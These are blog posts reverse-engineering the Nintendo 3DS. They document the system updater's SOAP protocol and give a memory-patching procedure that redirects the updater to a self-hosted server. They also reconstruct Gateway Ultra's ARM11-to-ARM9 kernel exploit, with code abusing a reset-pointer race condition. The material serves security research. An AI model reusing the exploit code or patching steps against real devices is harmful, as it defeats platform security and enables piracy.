Nintendo 3DS System Updater

Since there isn’t much public documentation on how the 3DS updater and the NIM module work, I thought I should write something up.

SSL

The 3DS talks with the Nintendo update servers (as well as eShop) over SSL, using a client certificate that is common to all 3DS consoles. The client certificate, its private key, and the Nintendo root CA are found in the title 0004001B00010002. The two files inside the title’s RomFS are additionally encrypted. The SSL system module decrypts the files and stores them in the process heap. The certificate, key, and root CA are all stored in DER format, so you may want to convert them to PKCS12 before using them to communicate with NUS on your own.
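As a rough sketch of the conversion step, the snippet below wraps DER blobs in PEM armor using only the Python standard library. Note that this produces PEM rather than PKCS12 (PKCS12 needs a tool such as OpenSSL), and the "RSA PRIVATE KEY" label used in the usage note is my assumption about the key encoding, not something I have confirmed.

```python
import base64
import ssl


def der_cert_to_pem(der: bytes) -> str:
    """Wrap a DER-encoded X.509 certificate in PEM armor."""
    return ssl.DER_cert_to_PEM_cert(der)


def der_to_pem(der: bytes, label: str) -> str:
    """Generic DER-to-PEM wrapper: base64 body split into 64-column lines."""
    b64 = base64.b64encode(der).decode("ascii")
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "-----BEGIN {0}-----\n{1}\n-----END {0}-----\n".format(
        label, "\n".join(lines))
```

For the key you would call something like der_to_pem(key_bytes, "RSA PRIVATE KEY"); if the key turns out to be PKCS#8, the label would be "PRIVATE KEY" instead.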

NIM

The NIM module is how the 3DS communicates with Nintendo’s servers through SOAP (and over SSL). The following is a typical update process.

The following request is made to https://nus.c.shop.nintendowifi.net/nus/services/NetUpdateSOAP (potentially identifying information has been stripped out):

POST /nus/services/NetUpdateSOAP HTTP/1.1
User-Agent: CTR NUP 040600 Mar 14 2012 13:32:39
Connection: Keep-Alive
Accept-Charset: UTF-8
Content-type: text/xml; charset=utf-8
SOAPAction: urn:nus.wsapi.broadon.com/GetSystemTitleHash
com.broadon.RequesterName: unitTest
com.broadon.RequesterHash: zzz
com.broadon.RequesterTimestamp: 1427146068799
Transfer-Encoding: chunked

<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:nus="urn:nus.wsapi.broadon.com">
<SOAP-ENV:Body>
<nus:GetSystemTitleHash xsi:type="nus:GetSystemTitleHashRequestType">
<nus:Version>1.0</nus:Version>
<nus:MessageId>EC-xxx-142714927</nus:MessageId>
<nus:DeviceId>xxx</nus:DeviceId>
<nus:RegionId>JPN</nus:RegionId>
<nus:CountryCode>JP</nus:CountryCode>
</nus:GetSystemTitleHash>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
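If you want to reproduce this request yourself, a minimal sketch of building the envelope might look like the following. The function names are mine, and the field order simply mirrors the capture above; I have not checked whether the server cares about ordering.

```python
from xml.sax.saxutils import escape

ENVELOPE = """<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
 xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 xmlns:xsd="http://www.w3.org/2001/XMLSchema"
 xmlns:nus="urn:nus.wsapi.broadon.com">
<SOAP-ENV:Body>
<nus:{action} xsi:type="nus:{action}RequestType">
{fields}
</nus:{action}>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
"""


def build_nus_request(action, fields):
    """Render a NUS SOAP request body from (name, value) pairs."""
    body = "\n".join(
        "<nus:{0}>{1}</nus:{0}>".format(name, escape(str(value)))
        for name, value in fields)
    return ENVELOPE.format(action=action, fields=body)


def build_title_hash_request(device_id, message_id, region="JPN", country="JP"):
    """Build the GetSystemTitleHash request shown in the capture."""
    return build_nus_request("GetSystemTitleHash", [
        ("Version", "1.0"),
        ("MessageId", message_id),
        ("DeviceId", device_id),
        ("RegionId", region),
        ("CountryCode", country),
    ])


def soap_action(action):
    """Value of the SOAPAction header for a NUS action."""
    return "urn:nus.wsapi.broadon.com/" + action
```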

Since the 3DS firmware is a collection of “titles” that can be updated independently, the updater has to make sure each title is up to date. To save time, it first gets a hash and checks if anything needs to be updated. The server responds:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Body>
<GetSystemTitleHashResponse xmlns="urn:nus.wsapi.broadon.com">
<Version>1.0</Version>
<DeviceId>xxx</DeviceId>
<MessageId>EC-xxx-154274329</MessageId>
<TimeStamp>1427146232957</TimeStamp>
<ErrorCode>0</ErrorCode>
<TitleHash>7E745F7B67D553BEA847859404790C93</TitleHash>
</GetSystemTitleHashResponse>
</soapenv:Body>
</soapenv:Envelope>
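The check on the response can be sketched as below. How the console derives its own hash is not something I have documented here, so local_hash is simply assumed to be available as a hex string.

```python
import xml.etree.ElementTree as ET

NUS = "{urn:nus.wsapi.broadon.com}"


def parse_title_hash(response_xml):
    """Return the TitleHash from a GetSystemTitleHashResponse."""
    root = ET.fromstring(response_xml)
    resp = root.find(".//" + NUS + "GetSystemTitleHashResponse")
    if resp is None:
        raise ValueError("not a GetSystemTitleHashResponse")
    error = int(resp.findtext(NUS + "ErrorCode", default="-1"))
    if error != 0:
        raise RuntimeError("server returned ErrorCode %d" % error)
    return resp.findtext(NUS + "TitleHash")


def update_needed(local_hash, response_xml):
    """True when the server hash differs from the (assumed known) local hash."""
    return parse_title_hash(response_xml).upper() != local_hash.upper()
```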

If the title hash matches the current system’s hash, then the updater exits. Otherwise, it continues and makes a request to https://ecs.c.shop.nintendowifi.net/ecs/services/ECommerceSOAP to get the latest update server URLs:

POST /ecs/services/ECommerceSOAP HTTP/1.1
User-Agent: CTR NUP 040600 Mar 14 2012 13:32:39
Connection: Keep-Alive
Accept-Charset: UTF-8
Content-type: text/xml; charset=utf-8
SOAPAction: urn:ecs.wsapi.broadon.com/GetAccountStatus
com.broadon.RequesterName: unitTest
com.broadon.RequesterHash: zzz
com.broadon.RequesterTimestamp: 1427146232982
Transfer-Encoding: chunked
Host: ecs.c.shop.nintendowifi.net

<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:ecs="urn:ecs.wsapi.broadon.com">
<SOAP-ENV:Body>
<ecs:GetAccountStatus xsi:type="ecs:GetAccountStatusRequestType">
<ecs:Version>2.0</ecs:Version>
<ecs:MessageId>EC-xxx-143998661</ecs:MessageId>
<ecs:DeviceId>xxx</ecs:DeviceId>
<ecs:DeviceToken>yyy</ecs:DeviceToken>
<ecs:AccountId>yyy</ecs:AccountId>
<ecs:ApplicationId>0004013000002c02</ecs:ApplicationId>
<ecs:TIN>1234</ecs:TIN>
<ecs:Region>JPN</ecs:Region>
<ecs:Country>JP</ecs:Country>
<ecs:Language>ja</ecs:Language>
<ecs:SerialNo>zzz</ecs:SerialNo>
<ecs:ECVersion>EC 4.6.0 Mar 14 2012 13:32:39</ecs:ECVersion>
<ecs:Locale>ja_JP</ecs:Locale>
<ecs:ServiceLevel>SYSTEM</ecs:ServiceLevel>
</ecs:GetAccountStatus>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

The server responds with the URLs to use:

<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Body>
<GetAccountStatusResponse xmlns="urn:ecs.wsapi.broadon.com">
<Version>2.0</Version>
<DeviceId>xxx</DeviceId>
<MessageId>EC-xxx-121712521</MessageId>
<TimeStamp>1427134562983</TimeStamp>
<ErrorCode>0</ErrorCode>
<ServiceStandbyMode>false</ServiceStandbyMode>
<AccountStatus>R</AccountStatus>
<ServiceURLs>
<Name>ContentPrefixURL</Name>
<URI>http://ccs.cdn.c.shop.nintendowifi.net/ccs/download</URI>
</ServiceURLs>
<ServiceURLs>
<Name>UncachedContentPrefixURL</Name>
<URI>https://ccs.c.shop.nintendowifi.net/ccs/download</URI>
</ServiceURLs>
<ServiceURLs>
<Name>SystemContentPrefixURL</Name>
<URI>http://nus.cdn.c.shop.nintendowifi.net/ccs/download</URI>
</ServiceURLs>
<ServiceURLs>
<Name>SystemUncachedContentPrefixURL</Name>
<URI>https://ccs.c.shop.nintendowifi.net/ccs/download</URI>
</ServiceURLs>
<ServiceURLs>
<Name>EcsURL</Name>
<URI>https://ecs.c.shop.nintendowifi.net/ecs/services/ECommerceSOAP</URI>
</ServiceURLs>
<ServiceURLs>
<Name>IasURL</Name>
<URI>https://ias.c.shop.nintendowifi.net/ias/services/IdentityAuthenticationSOAP</URI>
</ServiceURLs>
<ServiceURLs>
<Name>CasURL</Name>
<URI>https://cas.c.shop.nintendowifi.net/cas/services/CatalogingSOAP</URI>
</ServiceURLs>
<ServiceURLs>
<Name>NusURL</Name>
<URI>https://nus.c.shop.nintendowifi.net/nus/services/NetUpdateSOAP</URI>
</ServiceURLs>
</GetAccountStatusResponse>
</soapenv:Body>
</soapenv:Envelope>
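Pulling the name/URI pairs out of this response is straightforward. Here is a small sketch (the function name is mine) that turns the ServiceURLs entries into a dictionary so that NusURL can be looked up for the next request.

```python
import xml.etree.ElementTree as ET

ECS = "{urn:ecs.wsapi.broadon.com}"


def parse_service_urls(response_xml):
    """Map each ServiceURLs Name to its URI."""
    root = ET.fromstring(response_xml)
    urls = {}
    for entry in root.iter(ECS + "ServiceURLs"):
        name = entry.findtext(ECS + "Name")
        uri = entry.findtext(ECS + "URI")
        if name and uri:
            urls[name] = uri
    return urls
```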

Now, NIM sends the full list of title versions on the system as the next request to the SOAP server defined in NusURL.

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:nus="urn:nus.wsapi.broadon.com">
<SOAP-ENV:Body>
<nus:GetSystemUpdate xsi:type="nus:GetSystemUpdateRequestType">
<nus:Version>1.0</nus:Version>
<nus:MessageId>EC-xxx-147358457</nus:MessageId>
<nus:DeviceId>xxx</nus:DeviceId>
<nus:RegionId>JPN</nus:RegionId>
<nus:CountryCode>JP</nus:CountryCode>
<nus:Language>ja</nus:Language>
<nus:SerialNo>zzz</nus:SerialNo>
<nus:TitleVersion>
<nus:TitleId>1126106602178562</nus:TitleId>
<nus:Version>10</nus:Version>
</nus:TitleVersion>

<nus:TitleVersion>
<nus:TitleId>1126106065308162</nus:TitleId>
<nus:Version>7168</nus:Version>
</nus:TitleVersion>
</nus:GetSystemUpdate>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
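One detail worth noticing in the capture above is that the TitleId values in the request are written in decimal, whereas title IDs are normally written as 16 hex digits. A tiny helper (names are mine) converts between the two forms:

```python
def title_id_to_hex(decimal_id):
    """Decimal title ID (as sent in GetSystemUpdate) to 16-digit hex."""
    return format(int(decimal_id), "016X")


def title_id_to_decimal(hex_id):
    """16-digit hex title ID to the decimal string form."""
    return str(int(hex_id, 16))
```

For the two entries above, 1126106065308162 converts to 0004003000008A02 and 1126106602178562 converts to 0004003020008802.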

The server responds with the versions and metadata of all the titles corresponding to the device type and region.

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Body>
<GetSystemUpdateResponse xmlns="urn:nus.wsapi.broadon.com">
<Version>1.0</Version>
<DeviceId>xxx</DeviceId>
<MessageId>1</MessageId>
<TimeStamp>1414627502761</TimeStamp>
<ErrorCode>0</ErrorCode>
<ContentPrefixURL>http://nus.cdn.c.shop.nintendowifi.net/ccs/download</ContentPrefixURL>
<UncachedContentPrefixURL>https://ccs.c.shop.nintendowifi.net/ccs/download</UncachedContentPrefixURL>
<TitleVersion>
<TitleId>0004001000021000</TitleId>
<Version>8203</Version>
<FsSize>4931584</FsSize>
<TicketSize>848</TicketSize>
<TMDSize>4708</TMDSize>
</TitleVersion>

<TitleVersion>
<TitleId>0004013820000202</TitleId>
<Version>4816</Version>
<FsSize>1032192</FsSize>
<TicketSize>848</TicketSize>
<TMDSize>4660</TMDSize>
</TitleVersion>
<UploadAuditData>1</UploadAuditData>
<TitleHash>7E745F7B67D553BEA847859404790C93</TitleHash>
</GetSystemUpdateResponse>
</soapenv:Body>
</soapenv:Envelope>
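To make the comparison step concrete, here is a sketch that reads the TitleVersion entries from such a response and lists the titles that are missing or outdated. The installed dictionary (hex title ID to installed version) is a stand-in of mine for whatever NIM reads from the title database.

```python
import xml.etree.ElementTree as ET

NUS = "{urn:nus.wsapi.broadon.com}"


def titles_to_update(response_xml, installed):
    """Return (title_id, version) pairs that are new or newer than installed.

    installed maps upper-case hex title IDs to installed versions (ints).
    """
    root = ET.fromstring(response_xml)
    pending = []
    for entry in root.iter(NUS + "TitleVersion"):
        title_id = entry.findtext(NUS + "TitleId").upper()
        version = int(entry.findtext(NUS + "Version"))
        # A title that is not installed at all counts as needing download.
        if installed.get(title_id, -1) < version:
            pending.append((title_id, version))
    return pending
```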

If any titles are new to the system, NIM will request to get the common ticket for those titles.

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:nus="urn:nus.wsapi.broadon.com">
<SOAP-ENV:Body>
<nus:GetSystemCommonETicket xsi:type="nus:GetSystemCommonETicketRequestType">
<nus:Version>1.0</nus:Version>
<nus:MessageId>EC-xxx-170576756</nus:MessageId>
<nus:DeviceId>xxx</nus:DeviceId>
<nus:RegionId>JPN</nus:RegionId>
<nus:CountryCode>JP</nus:CountryCode>
<nus:Language>ja</nus:Language>
<nus:SerialNo>zzz</nus:SerialNo>
<nus:TitleId>0004001000021000</nus:TitleId>

<nus:TitleId>000400DB20016302</nus:TitleId>
</nus:GetSystemCommonETicket>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

The server returns base64-encoded tickets for each title, along with a certificate chain for the tickets. As an aside, common tickets are the kind used for firmware components. Regular games use tickets tied to a specific account (not “common”).

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Body>
<GetSystemCommonETicketResponse xmlns="urn:nus.wsapi.broadon.com">
<Version>1.0</Version>
<DeviceId>xxx</DeviceId>
<MessageId>EC-xxx-244400570</MessageId>
<TimeStamp>1427142110949</TimeStamp>
<ErrorCode>0</ErrorCode>
<CommonETicket>…</CommonETicket>

<CommonETicket>…</CommonETicket>
<Certs>…</Certs>
<Certs>…</Certs>
</GetSystemCommonETicketResponse>
</soapenv:Body>
</soapenv:Envelope>

Now, the system is ready to download the updated titles. For each title in the GetSystemUpdateResponse, if the version is higher than the currently installed version, NIM first gets the title metadata from the ContentPrefixURL. For example, version 8203 of title 0004001000021000 is downloaded from: http://ccs.cdn.c.shop.nintendowifi.net/ccs/download/0004001000021000/tmd.8203?deviceId=xxx&accountId=zzz

It then parses the title metadata, which contains a list of content archives to download. For the example above, it will download http://nus.cdn.c.shop.nintendowifi.net/ccs/download/0004001000021000/00000043 and http://nus.cdn.c.shop.nintendowifi.net/ccs/download/0004001000021000/00000045
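The URL layout in the two examples above can be sketched as follows. The helper names are mine, and the content ID is passed as the literal string that appears in the URL rather than being derived from the TMD.

```python
def tmd_url(prefix, title_id, version, device_id=None, account_id=None):
    """URL of the title metadata for one version of a title."""
    url = "{}/{}/tmd.{}".format(prefix.rstrip("/"), title_id, version)
    if device_id is not None and account_id is not None:
        url += "?deviceId={}&accountId={}".format(device_id, account_id)
    return url


def content_url(prefix, title_id, content_id):
    """URL of one content archive listed in the title metadata."""
    return "{}/{}/{}".format(prefix.rstrip("/"), title_id, content_id)
```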

Once all the titles are downloaded, it makes another GetSystemTitleHash request (presumably to check if there’s an update released while the device was being updated).

More Information

For more information on downloading titles from Nintendo CDN, check out Rely’s CDN downloader script. For more information on talking with Nintendo’s SOAP servers, check out yellows8’s ninupdates (you need the client certificate and key from the SSL module as described above) or his update reports. These tools were indispensable for figuring out the updater.

Appendix: Updating N3DS 8.1.0-0J to 9.2.0-20J

The motivation behind figuring out how the update process worked was so I could manually update my Japanese N3DS from the stock 8.1 (which does not support ninjhax) to 9.2 (the last version that supports ninjhax). I’ll quickly describe how it is done, but since the process is a bit involved, I would not recommend that anyone inexperienced try it (you can easily brick the console or update to the latest version by accident). I only attempted this on a Japanese N3DS going from 8.1.0-0J to 9.2.0-20J, but it should work with other configurations provided you get the right files and offsets.

Prerequisites

  • Cubic Ninja
  • NTR CFW 2.0 and NTR Debugger
  • A web server with support for some kind of scripting language (PHP for example)
  • Clear any pending update by entering recovery mode and exiting (I don’t think this is needed but better safe than sorry)

Steps

  1. Host the SOAP response for the version you want to update to on your web server. You can find all the raw SOAP responses on yellows8’s update report site. For example, here is the one for 9.1.0-20J. According to yellows8, there was a bug and his bot did not capture 9.2.0-20J. However, since only two titles changed in that update, I just manually crafted a 9.2.0-20J response.
  2. Host the SOAP response for the update title hash. Here is the template. You need to change the value of the TitleHash to match the TitleHash at the end of your update response from step 1.
  3. Create a script that responds with one of the two SOAP responses above depending on whether the SOAPAction request header is “urn:nus.wsapi.broadon.com/GetSystemUpdate” or “urn:nus.wsapi.broadon.com/GetSystemTitleHash”. I made a two-line PHP script called “update.php” that does this.
  4. Host the SOAP response for getting the server URLs. The template for this is here. You only need to change the value of NusURL to point to your NUS responder script created in step 3. (In my case, it would be http://myhost.com/update.php)
  5. Boot your 3DS into NTR CFW 2.0 and connect the debugger
  6. Use listprocess() to get the PID for “nim”. On 8.1.0-0J, it should be 0x25.
  7. Patch NIM to use your server for NetUpdateSOAP (this offset is for 8.1.0-0J): write(0x15E424, tuple(map(ord, "http://myhost.com/update.php\0")), pid=0x25)
  8. Patch NIM to use your server for ECommerceSOAP. Since you’re only responding to GetAccountStatus, it is okay to hard code this: write(0x15E0EC, tuple(map(ord, "http://myhost.com/GetAccountStatus_response.xml\0")), pid=0x25)
  9. Do the same for another reference to ECommerceSOAP: write(0x15E463, tuple(map(ord, "http://myhost.com/GetAccountStatus_response.xml\0")), pid=0x25)
  10. Go into system settings, and perform an update (do NOT exit system settings as you will lose your patches and will have to perform them again after restarting).
  11. Once the update is done, you will be prompted to restart. However, because you are in NTR mode, the screen will just go black, so you need to hold the power button and restart manually.
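The dispatch logic from step 3 is simple enough to sketch. I used PHP, but the same idea in Python looks like this; the response file names are placeholders of mine for wherever you saved the responses from steps 1 and 2.

```python
# Hypothetical file names for the two hosted SOAP responses.
RESPONSES = {
    "urn:nus.wsapi.broadon.com/GetSystemUpdate": "GetSystemUpdate_response.xml",
    "urn:nus.wsapi.broadon.com/GetSystemTitleHash": "GetSystemTitleHash_response.xml",
}


def pick_response(soap_action):
    """Choose the response file for a SOAPAction header value, or None."""
    # Some clients wrap the header value in double quotes, so strip them.
    action = (soap_action or "").strip().strip('"')
    return RESPONSES.get(action)
```

A request handler would read the SOAPAction header, call pick_response, and send back the contents of the returned file with a text/xml content type.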

Reversing Gateway Ultra Stage 3: Owning ARM9 Kernel

First, some background: the 3DS has two main processors. Last time, I went over how Gateway Ultra exploited the ARM11 processor. However, most of the interesting (from a security perspective) functionality is handled by a separate ARM946 processor. The ARM9 processor is in charge of the initial system bootup, some system services, and most importantly all the cryptographic functions such as encryption/decryption and signing/verification. In this post, we will look at how to run (privileged) code on the ARM9 processor, given privileged access to the ARM11 processor. Please note that this writeup is a work in progress as I have not completely figured out how the exploit works (only the main parts of it). Specifically, there are a couple of steps where I do not know whether they are done for the sake of the exploit or purely for stability or obfuscation. From a developer’s perspective, it doesn’t matter because as long as you perform all the steps, you will achieve code execution. But from a hacker’s perspective, the information is not complete unless all aspects are known and understood. I am posting this now as-is because I do not know when I’ll have time to work on the 3DS again. However, when I do, I will update the post and hopefully clear up all confusion.

Code

For simplicity in description, from this point on, I will use pointers and offset values specific to the 4.x kernel. However, the code is the same for all firmware versions.

void arm11_kernel_entry(void) // pointers specific to 4.x
{
  int (*sub_FFF748C4)(int, int, int, int) = 0xFFF748C4;

  __clrex(); // release any exclusive access
  memcpy(0xF3FFFF00, 0x08F01010, 0x1C);// copy GW specific data
  invalidate_dcache();
  invalidate_icache();
  clear_framebuffer(); // clear screen and saves some GPU registers
  // ARM9 code copied to FCRAM 0x23F00000
  memcpy(0xF3F00000, ARM9_PAYLOAD, ARM9_PAYLOAD_LEN);
  // write function hook at 0xFFFF0C80
  memcpy(0xEFFF4C80, jump_table, FUNC_LEN);
  // write FW specific offsets to copied code buffer
  *(int *)(0xEFFF4C80 + 0x60) = 0xFFFD0000; // PDN regs
  *(int *)(0xEFFF4C80 + 0x64) = 0xFFFD2000; // PXI regs
  *(int *)(0xEFFF4C80 + 0x68) = 0xFFF84DDC; // where to return to from hook
  // patch function 0xFFF84D90 to jump to our hook
  *(int *)(0xFFF84DD4 + 0) = 0xE51FF004; // ldr pc, [pc, #-4]
  *(int *)(0xFFF84DD4 + 4) = 0xFFFF0C80; // jump_table + 0
  // patch reboot start function to jump to our hook
  *(int *)(0xFFFF097C + 0) = 0xE51FF004; // ldr pc, [pc, #-4]
  *(int *)(0xFFFF097C + 4) = 0x1FFF4C84; // jump_table + 4
  invalidate_dcache();
  sub_FFF748C4(0, 0, 2, 0); // trigger reboot
}

// not called directly, offset determines jump
void jump_table(void)
{
  func_patch_hook();
  reboot_func();
}

void func_patch_hook(void)
{
  // data written from entry (stored at hook + 0x60, + 0x64 and + 0x68)
  int pdn_regs;
  int pxi_regs;
  int (*func_hook_return)(void);
  volatile int i; // counter for the busy spins

  // save context
  __asm__ ("stmfd sp!, {r0-r12,lr}");
  // TODO: Why is this needed?
  pxi_send(pxi_regs, 0);
  pxi_sync(pxi_regs);
  pxi_send(pxi_regs, 0x10000);
  pxi_recv(pxi_regs);
  pxi_recv(pxi_regs);
  pxi_recv(pxi_regs);
  // TODO: What does this do?
  *(char *)(pdn_regs + 0x230) = 2;
  for (i = 0; i < 16; i += 2); // busy spin
  *(char *)(pdn_regs + 0x230) = 0;
  for (i = 0; i < 16; i += 2); // busy spin
  // restore context and run the two instructions that were replaced
  __asm__ ("ldmfd sp!, {r0-r12,lr}\t\n"
           "ldr r0, =0x44836\t\n"
           "str r0, [r1]\t\n"
           "ldr pc, %0" :: "m" (func_hook_return));
}

// this is a patched version of function 0xFFFF097C
// code found in the original function is skipped
void reboot_func(void)
{
  ... // setup
  // disable all interrupts
  __asm__ ("mrs r0, cpsr\t\n"
           "orr r0, r0, #0x1C0\t\n"
           "msr cpsr_cx, r0" ::: "r0");
  while ( *(char *)0x10140000 & 1 ); // wait for powerup ready
  *(void **)0x2400000C = 0x23F00000; // our ARM9 payload
  ...
}

Memory Configurations

A quick side note on the way that ARM11 talks to ARM9. There is a FIFO with a register interface called the PXI, which is used to pass data between the two processors. Additionally, most of the physical memory mappings are shared between the two processors. Data stored, for example, in the FCRAM or AXI WRAM can be seen by both processors (provided the caches are kept coherent). However, there is one region (physical 0x08000000 to 0x08100000) that only the ARM9 processor can see. ARM9 code runs in this region. Another thing to note is that the ARM9 processor only uses one-to-one virtual memory addressing (that is, physical and virtual addresses are the same), but I have been told that it does have memory protection enabled.

ARM9 Process

The ARM9 processor only (ever) has one process running, Process9, which speaks with the kernel to handle commands from ARM11. Process9 has access to a special syscall 0x7B, which takes in a function pointer and executes it in kernel mode. This means that essentially, owning ARM9 usermode is enough to get kernel code execution without any additional exploits.

Exploit Setup

After doing some housekeeping, the first thing the second stage payload code does is copy the third stage ARM9 code to a known location in FCRAM. Next, it patches two ARM11 kernel functions. First, it patches the function at 0xFFF84D90 (I believe this function performs the kernel reboot) to jump into a function hook early on. Second, it patches the function at 0xFFFF097C (I believe this function is run after the ARM11 processor resets) to jump into another function hook. These two hooks are the key to how the exploit works.

Soft Rebooting

The 3DS supports soft rebooting (resetting the processor state without clearing the memory) in order to switch modes (ex: for DS games) and presumably to enable entering and exiting sleep mode. I believe this is triggered at the end of the exploit setup by calling the function at 0xFFF748C4. At some point in this function, the subroutine at 0xFFF84D90 is called, which runs the code in our first function hook before continuing the execution.

At the same time on the ARM9 processor, Process9 waits for a special command, 0x44836, from PXI in the function at 0x0807B97C. I believe that the first function hook in ARM11 sends a series of commands to put Process9 into function 0x0807B97C, but that is only a guess.

The ARM11 processor continues to talk with ARM9 through the PXI and at some point both agree on a shared buffer in FCRAM at 0x24000000 (EDIT: yellows8 says this is the FIRM header) where some information is stored. At 0x2400000C is a function pointer to what ARM9 should execute after the reset. Process9 verifies that this function pointer is in the ARM9 private memory region 0x08000000-0x08100000 (EDIT: I assume the FIRM header signature check also takes place at this point). ARM11 resets and spinlocks in the function at 0xFFFF097C to wait for ARM9 to finish its tasks and tell ARM11 what to do.

Process9 at this point uses SVC 0x7B to jump into some reset handler at 0x080FF600 in kernel mode. At the end of that function, the ARM9 kernel reads the pointer value at 0x2400000C and jumps to it.

Reset TOCTTOU

The problem here is simple. Process9 checks that the data at 0x2400000C (which is FCRAM, shared by both processors) is a valid pointer to code in ARM9 private memory (that ARM11 cannot access). However, after the check passes and before the function pointer is used, ARM11 can overwrite the value to point to code in FCRAM and ARM9 will execute it when it resets. This time-of-check-to-time-of-use bug is made possible by patching the ARM11 function that runs after reset so that it can wait for the right signal and then quickly overwrite the data in FCRAM before ARM9 uses it.
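The race can be modeled in a few lines. This is only a toy model of the logic described above, not real 3DS code: the shared buffer is a dictionary, and the "legitimate" entry point value is a made-up address inside ARM9 private memory.

```python
ARM9_PRIVATE = range(0x08000000, 0x08100000)
ENTRY_PTR = 0x2400000C           # function pointer slot in shared FCRAM
LEGIT_ENTRY = 0x0801B01C         # hypothetical address, for illustration only
PAYLOAD = 0x23F00000             # ARM9 payload copied to FCRAM by the exploit


def process9_check(fcram):
    """Time of check: Process9 validates the pointer."""
    return fcram[ENTRY_PTR] in ARM9_PRIVATE


def arm9_reset_jump(fcram):
    """Time of use: the ARM9 kernel re-reads the pointer and jumps to it."""
    return fcram[ENTRY_PTR]


def simulate(arm11_races):
    fcram = {ENTRY_PTR: LEGIT_ENTRY}
    if not process9_check(fcram):
        raise RuntimeError("pointer rejected")
    if arm11_races:
        # The patched ARM11 reset function overwrites the slot after the check.
        fcram[ENTRY_PTR] = PAYLOAD
    return arm9_reset_jump(fcram)
```

Without the race the ARM9 jumps into its private memory. With it, the check still passes but the jump lands on 0x23F00000.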

Conclusions

I apologize for the vagueness and likely mistakes in parts. I hope that if I don’t have the time to finish this analysis, someone else can pick up where I left off. Specifically, there are a couple of main questions that I haven’t answered:

  1. What is the function at 0xFFF748C4, what do the arguments do, and how does it call into function 0xFFF84D90? I speculate that it’s a function that performs the reset, but a more precise description is needed.
  2. What is the purpose of the first function hook? Specifically why does it send 0 and 0x10000 through PXI and what does PDN register 0x230 do?
  3. How does Process9 enter function 0x0807B97C? I suspect that it may have something to do with the first function hook in ARM11.

I hope that either someone can answer these questions (as well as correct any mistakes I’ve made) or that I’ll have time in the future to continue this analysis. This will also be the end of my journey to reverse Gateway Ultra (but the next release may spark my interest again). I don’t particularly care about the later stages (I hear there’s a modified MIPS VM and timing based obfuscation) or how Gateway enforces DRM to make sure only their card is used. If I do any more reversing with the 3DS, it would be on the kernel and applications so I can make patches of my own instead of worrying about how Gateway does it.

At this point, the information should be enough for anyone to take complete control of the 3DS (<= 9.2.0). I believe that information on its own is amoral but it takes people to make it immoral. There’s no point in arguing if piracy is right or wrong or if making this information public would help or harm pirates. I am not here to ensure the 3DS thrives. I am not here to take business away from Gateway. I am not here to be a moral police. I am only here to make sure that information is available for those who thirst for knowledge as much as I do in a form that is as precise and accurate as I can make it.

Reversing Gateway Ultra Stage 2: Owning ARM11 Kernel

It’s been a couple of days since my initial analysis of Gateway Ultra, released last week to enable piracy on 3DS. I spent most of this time catching up on the internals of the 3DS. I can’t thank the maintainers of 3dbrew enough (especially yellows8, the master of 3DS reversing) for the amount of detailed and technical knowledge found on the wiki. The first stage was a warmup and did not require any specific 3DS knowledge to reverse. The problem with the second stage is that while it is easy to see the exploit being triggered and the code that runs, the actual exploit itself was not as clear. I looked at all the function calls made, formed a couple of hypotheses about where the vulnerability resided, and reversed each function to the end to test them. Although there were many dead ends and false leads, the process of reversing all these functions solidified my understanding of the system.

Code

As always, I like to post the reversed code first so those with more knowledge than me don’t have to read my verbose descriptions. I will explain the interesting parts afterwards. I am including the full code listing of the shellcode, including parts that are irrelevant because they are used as obfuscation, to provide stability, or as setup for later parts.

int memcpy(void *dst, const void *src, unsigned int len);
int GX_SetTextureCopy(void *input_buffer, void *output_buffer, unsigned int size, 
                      int in_x, int in_y, int out_x, int out_y, int flags);
int GSPGPU_FlushDataCache(void *addr, unsigned int len);
int svcSleepThread(unsigned long long nanoseconds);
